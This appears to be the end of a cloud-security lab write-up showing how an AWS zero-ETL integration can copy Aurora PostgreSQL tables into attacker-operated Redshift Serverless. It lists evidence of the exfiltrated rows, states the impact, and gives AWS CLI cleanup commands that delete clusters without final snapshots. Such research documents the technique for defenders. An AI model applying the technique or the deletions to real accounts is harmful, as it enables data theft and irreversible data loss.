- SVV_INTEGRATION showed integration_id 377a462b-c42c-4f08-937b-77fe75d98211 with state PendingDbConnectState before the DB was created.
- After CREATE DATABASE FROM INTEGRATION, listing tables revealed schema ztl and table customers; selecting from ztl.customers returned 2 rows (Alice, Bob).
Impact: Near real-time exfiltration of selected Aurora PostgreSQL tables into attacker-operated Redshift Serverless, without using database credentials, backups, or network access to the source cluster.
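Cleanup (a minimal sketch, assuming the lab resources created above):
aws rds delete-integration --region $REGION --integration-identifier <INTEGRATION_ARN_OR_ID>
aws rds delete-db-instance --region $REGION --db-instance-identifier ${CLUSTER_ID}-instance-1 --skip-final-snapshot
aws rds delete-db-cluster --region $REGION --db-cluster-identifier $CLUSTER_ID --skip-final-snapshot
aws redshift-serverless delete-workgroup --region $REGION --workgroup-name ztl-wg
aws redshift-serverless delete-namespace --region $REGION --namespace-name ztl-ns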